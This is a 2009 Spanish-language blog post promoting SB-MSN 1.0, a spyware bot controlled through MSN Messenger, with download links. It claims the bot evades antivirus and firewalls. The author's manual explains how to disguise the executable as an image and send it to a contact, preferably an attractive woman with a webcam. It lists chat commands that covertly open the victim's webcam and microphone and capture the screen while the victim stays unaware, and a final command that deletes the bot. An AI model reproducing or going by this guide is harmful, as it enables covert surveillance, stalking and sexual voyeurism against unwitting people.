zona msn

;

sábado, 11 de julio de 2009



SB-MSN 1.0

Les presento este programita nuevo creado por octalh, basicamente sirve para espiar a tus contactos de msn, por ahora dispone de captura de webcam, sonido y pantalla de la pc remota, su uso es muy simple y no requiere de mapear puertos ni cosas extrañas ya que se conecta directamente desde el msn, ademas es indetectable a los avs y a los firewalls... abajo de la imagen les dejo la descripcion original de octalh, y un pequeño manual hecho por mi de como se usa por si no lo entienden, de todos modos dentro de la descarga tienen un archivo con los comandos y demas.



SB-MSN Ver. 1.0 es un robot programado en Delphi que opera y realiza acciones interpretando comandos vía MSN Messenger a través de una charla de conversación. Por ahora cuenta con pocos comandos pero con el transcurso del proyecto se añadirán nuevas funcionalidades.
SB-MSN Ver. 1.0 por ahora solo cumple funciones de vigilancia como espectador en el equipo remoto, por lo que aun no podría considerarse un software de administración remota.

Que hace especial a SB-MSN?
Debido a que no requiere de un protocolo extra ni una conexión cliente-servidor externa a MSN Messenger, no requieres de ningún tipo de cliente espacial, únicamente tener una cuenta de correo en MSN y escribir los comandos en una ventana de conversación, por lo que lo convierte en un cliente Multiplataforma.
También tiene la habilidad de burlar el FW ya que no conecta a ningúna otra IP externa excepto a los servidores de MSN donde se lleva acabo dicha conversación con el BOT.
SB-MSN Ver. 1.0 Trabaja utilizando el API de MSN , y la interpretación de comandos tiene que delimitarse con prefijos para el inicio y el final del comando.

Como se usa?
Facil, primero abrimos el editor dsb-msn y lo configuramos, en donde dice correo electronico ponemos nuestro correo electronico, tiene que ser de hotmail, despues ponemos aceptar y seleccionamos el server que venia en el archivo, obiamente despues le cambian el nombre lo juntan con una imagen o le cambian el icono, ustedes se las ingenian.
Despues le enviamos ese server a algun contacto del msn (preferentemente alguna mina que este buena y que tenga web cam jaja).
Una vez que nuestro contacto ejecute el server nos colocamos en estado "sali a comer" y lo saludamos al bot (hay que ser educados), escribimos el siguiente comando en la ventana de chat ./hola/. y nos debe responder, por lo tanto el bot funciona, su contacto no vera lo que escriben mientras esten en el estado "sali a comer", asi que no se preocupen.
Ahora iniciamos una videollamada, para ello escribimos ./videollamada/. y nos aparece si desamos aceptar o rechazar, aceptamos y podremos escuchar y ver a nuestro contacto, el no se enterara de nada hasta que cambiemos nuestro estado.
Para recivir una captura escriben ./pantalla/. y se les enviara un archivo con una captura de pantalla.
Para cerrar la secion con el bot ponene ./adios/. y podran seguir chateando con su contacto.
Cuando quieran borrar el bot ponen ./suicidio/. y listo los devolvera a su estado de conectado y el bot se habra borrado

descarga : 1
http://rapidshare.com/files/105755309/SB-MSN_1.0.rar.html
2
http://www.megaupload.com/?d=YQAL1OIQ

0 comentarios: